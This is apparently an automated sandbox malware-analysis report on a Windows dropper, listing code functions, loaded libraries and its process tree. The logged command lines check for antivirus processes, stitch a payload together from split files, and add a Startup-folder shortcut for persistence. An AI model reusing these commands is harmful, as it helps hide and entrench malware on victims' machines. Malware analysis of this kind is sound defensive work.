Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B3F6A010_2_00B3F6A0
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B4F62810_2_00B4F628
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B3166310_2_00B31663
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B578C310_2_00B578C3
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B5DBA510_2_00B5DBA5
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B51BA810_2_00B51BA8
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B69CE510_2_00B69CE5
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B4DD2810_2_00B4DD28
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B5BFD610_2_00B5BFD6
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B51FC010_2_00B51FC0
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_0069B02015_2_0069B020
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_006994E015_2_006994E0
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_00699C8015_2_00699C80
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_006B23F515_2_006B23F5
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_0071840015_2_00718400
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_006C650215_2_006C6502
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_006C265E15_2_006C265E
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_0069E6F015_2_0069E6F0
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_006B282A15_2_006B282A
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_006C89BF15_2_006C89BF
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_006C6A7415_2_006C6A74
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_00710A3A15_2_00710A3A
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_006A0BE015_2_006A0BE0
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_006BCD5115_2_006BCD51
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_006EEDB215_2_006EEDB2
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_006F8E4415_2_006F8E44
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_00710EB715_2_00710EB7
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_006C6FE615_2_006C6FE6
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_006B33B715_2_006B33B7
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_006AD45D15_2_006AD45D
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_006BF40915_2_006BF409
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_0069166315_2_00691663
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_006AF62815_2_006AF628
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_0069F6A015_2_0069F6A0
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_006B16B415_2_006B16B4
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_006B78C315_2_006B78C3
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_006B1BA815_2_006B1BA8
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_006BDBA515_2_006BDBA5
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_006C9CE515_2_006C9CE5
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_006ADD2815_2_006ADD28
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_006B1FC015_2_006B1FC0
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_006BBFD615_2_006BBFD6
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif 237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\585723\Designing.pif 237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: String function: 00B41A36 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: String function: 00B58B30 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: String function: 00B50D17 appears 70 times
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: String function: 006B0D17 appears 70 times
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: String function: 006A1A36 appears 34 times
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: String function: 006B8B30 appears 42 times
Source: C3KzPHU3UG.exeStatic PE information: invalid certificate
Source: C3KzPHU3UG.exe, 00000000.00000002.1653619753.00000000007B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs C3KzPHU3UG.exe
Source: C3KzPHU3UG.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engineClassification label: mal80.expl.evad.winEXE@28/15@2/0
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B9A6AD GetLastError,FormatMessageW,10_2_00B9A6AD
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B88DE9 AdjustTokenPrivileges,CloseHandle,10_2_00B88DE9
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B89399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,10_2_00B89399
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_006E8DE9 AdjustTokenPrivileges,CloseHandle,15_2_006E8DE9
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_006E9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,15_2_006E9399
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeCode function: 0_2_0040400B GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_0040400B
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B94148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,10_2_00B94148
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeCode function: 0_2_00402218 CoCreateInstance,0_2_00402218
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B9443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,10_2_00B9443D
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifFile created: C:\Users\user\AppData\Local\SyncTech InnovationsJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7960:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7704:120:WilError_03
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeFile created: C:\Users\user\AppData\Local\Temp\nshE67D.tmpJump to behavior
Source: C3KzPHU3UG.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C3KzPHU3UG.exeReversingLabs: Detection: 33%
Source: C3KzPHU3UG.exeVirustotal: Detection: 36%
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeFile read: C:\Users\user\Desktop\C3KzPHU3UG.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\C3KzPHU3UG.exe "C:\Users\user\Desktop\C3KzPHU3UG.exe"
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Sexuality Sexuality.cmd & Sexuality.cmd & exit
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 585723
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "TranscriptHousesConstitutesMedicaid" Hate
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Rod + ..\Keep + ..\Prep + ..\Tsunami + ..\Invitations F
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\585723\Designing.pif Designing.pif F
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EchoSync.url" & echo URL="C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EchoSync.url" & exit
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.js"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif "C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif" "C:\Users\user\AppData\Local\SyncTech Innovations\p"
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Sexuality Sexuality.cmd & Sexuality.cmd & exitJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 585723Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "TranscriptHousesConstitutesMedicaid" Hate Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Rod + ..\Keep + ..\Prep + ..\Tsunami + ..\Invitations FJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\585723\Designing.pif Designing.pif FJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EchoSync.url" & echo URL="C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EchoSync.url" & exitJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif "C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif" "C:\Users\user\AppData\Local\SyncTech Innovations\p"Jump to behavior
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeCode function: 0_2_00405BBF GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405BBF
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B5E93F push edi; ret 10_2_00B5E941
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B5EA58 push esi; ret 10_2_00B5EA5A
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B58B75 push ecx; ret 10_2_00B58B88
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B5EC33 push esi; ret 10_2_00B5EC35
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B5ED1C push edi; ret 10_2_00B5ED1E
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_006B8B75 push ecx; ret 15_2_006B8B88

Persistence and Installation Behavior

barindex
Drops PE files with a suspicious file extension
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\585723\Designing.pifJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifFile created: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\585723\Designing.pifJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifFile created: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EchoSync.urlJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EchoSync.urlJump to behavior
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00BB59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,10_2_00BB59B3
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B45EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,10_2_00B45EDA
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_007159B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,15_2_007159B3
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_006A5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,15_2_006A5EDA
